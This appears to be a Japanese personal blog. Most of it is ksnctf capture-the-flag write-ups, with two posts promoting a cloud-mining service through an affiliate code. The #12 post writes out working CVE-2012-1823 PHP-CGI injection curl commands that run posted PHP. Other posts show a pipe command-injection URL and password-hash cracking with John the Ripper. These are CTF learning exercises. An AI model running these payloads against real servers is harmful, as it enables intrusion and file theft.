ctfのお勉強 ksnctf #7 Programming
ksnctfを解いてみた
#7 Programming
コンパイルして実行してみたが、cppファイルだけどもC++言語ではない。
いろいろ調べてみるとwhitespaceという言語らしい。
ここ使うと便利。
https://whitespace.kauaveel.ee/
実行するとPINコードをもとめられる。
デバックにアセンブリコードが書かれているので、そこから怪しい数値をいれてみたら通った。
なんか微妙な問題。。
ctfのお勉強 ksnctf #12 hypertext processor
ksnctfを解いてみた
#12 hypertext processor
タイトルからPHP関連かなと想像
何度かアクセスすると下の方の数字は変わるけど上の方の数字2012:1823はかわらず。
とりあえず、ヘッダからバージョン確認
$>curl -I ctfq.sweetduet.info:10080/~q12/ HTTP/1.1 200 OK Date: Sun, 05 Nov 2017 02:22:44 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.1 Connection: close Content-Type: text/html; charset=UTF-8
php5.4.1で検索するとCVE-2012-1823が見つかるので-sでアクセスしてみる
2012:1823はこのことですか。
フラグはここにあるよと。
ディレクトリ一覧を取得
curl -v http://ctfq.sweetduet.info:10080/\~q12/index.php\?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -X POST -d "<?php print_r(scandir('.'));?>"
ファイルがわかったので、中身をみます
curl -v http://ctfq.sweetduet.info:10080/\~q12/index.php\?-d+allow_url_include%3DOn+-d+auto_prepend_file%3Dphp://input -X POST -d "<?php echo readfile('flag_flag_flag.txt');?>"
仮想通貨マイニングその後1
先月始めたクラウドマイニング
https://www.genesis-mining.com
一ヶ月経ちました。
どのくらい儲かっているのかというと
一ヶ月で1500円くらいです。
1500*24=36000円
購入当初1ドル112円くらいで300ドル分購入したので、
33600円
36000円-33600円=2400円
二年で2400円かとおもうと正直微妙ですね。
イーサリアムのチャートはこんな感じです。
今後爆発的に上がれば儲けがあるかもしれませんが。。。
なんかこれだと今300ドル分かって二年放置していたほうが儲かるんじゃないかと。。
アフィリエイトでハッシュパワー増強しないと。。
こんなネガティブ記事書いていますが、興味のある方は是非w
Genesis Mining プロモコード:EmF3TV
入力すると3%引きで購入できます。
仮想通貨のマイニングを初めてみる
最近はやりの仮想通貨のマイニングをはじめてみました。
bitcoinはメジャーすぎて個人で掘るのはかなり厳しいとのことなので、他のコインを。
ハード購入してとも思ったのですが、電気代とかスペース考えると日本でやるのは現実的ではないので、
今回はここを使ってクラウドマインングをはじめてみました。
https://www.genesis-mining.com/
二年契約で払いきり、購入後すぐに使える。
いろいろ調べてみたのですが、一番ここがまともそう。なかには倒産するところとかもあるようです。
アカウント作成してハッシュパワーを購入します。Etherを10MH/s購入しました。US$300ほどです。
現在EtherとMoneroの購入ができます。売り切れ(Bitcoin/Litecoin/Zcash/Dash)もあるようなので、買えるときに買ったほうがよいかと思います。
途中報告は随時あっぷしたいとおもいます。
Genesis Mining プロモコード:EmF3TV
入力すると3%引きで購入できますので是非。あくまで自己責任で。
ctfのお勉強 ksnctf #35 simple auth 2 #26 Sherlock Holmes
ksnctfを解いてみた
#35 simple auth 2
認証ページとソースコードが落ちている。
一見SQL injectionかなともおもい。
ソースコードを見るとdbにアクセスしているところが見られる。
dbファイル名入れると直接ダウンロード。
試しにsqliteで開いてみるとノーパスでそのままアクセスできた。
あとはテーブルの中身を探っていくとFLAGが。
#26 Sherlock Holmes
長い文章が。ソースぺージもありステガノを疑ってDiffを取ってみるも
違いはなさそう。
アクセス先URLを見ると、必ず index.plを返してtxtを表示させているようだ。
http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_1.txt http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_2.txt http://ctfq.sweetduet.info:10080/~q26/index.pl/a_scandal_in_bohemia_3.txt
ルートパスを開くと、
http://ctfq.sweetduet.info:10080/~q26/
ファイルが見えてくる。
flag.txtはあるが、index.plを見ろと。
index.plを見るとヒントが。
ヒントに従って、インジェクション(index.pl/%7Cecho%20h%40ck3d%5C%21%20%3E%20cracked.txt)して、ファイルを作って
FLAGが
ctfのお勉強 ksnctf #14 John
ksnctfを解いてみた
#14 John
問題を見た瞬間からJohn the Ripper かなと推測。
よくみるとここに辞書があるよと書いてある。
user99:$6$SHA512IsStrong$DictionaryIsHere.http//ksnctf.sweetduet.info/q/14/
dicti0nary_8Th64ikELWEsZFrf.txt:15491:0:99999:7:::
辞書をダウンロードして保存。
$>curl ksnctf.sweetduet.info/q/14/dicti0nary_8Th64ikELWEsZFrf.txt > dic.txt
あとはjohnを実行するだけ。
結果を確認する。
#john --show shad
頭の文字がフラグになっているので、それをいれてやる。
ctfのお勉強
#13 Proverb
SSH: ctfq.sweetduet.info:10022
ID: q13
Pass: 8zvWx00MakSCQuGq
sshでアクセスしてみる。ファイルが並んでいる。
-r-------- 2 q13a q13a 22 6月 1 05:21 2012 flag.txt
---s--x--x 1 q13a q13a 14439 6月 1 04:59 2012 proverb
-r--r--r-- 1 root root 755 6月 1 04:58 2012 proverb.txt
-r--r--r-- 1 root root 151 6月 1 04:48 2012 readme.txt
開けるファイルから見ていくとreadme.txtとproverb.txtは読めるみたい
proverbを実行するとproverb.txtを読み込んで表示される様子
readmeには/tmp配下でやれと記載が。
/tmp配下に移動してみるとlsコマンドは実行できないがproverbとかのファイルはある模様。
サブディレクトリを作ってやれとご指定があるので、サブディレクトリ作成して
homeからproverbをコピーしようとするができず。
/tmp配下にあるものをコピーしてみるとコピーできる。
flagもコピーしてflag.txtのファイルをproverb.txtに名前変更して実行すると。。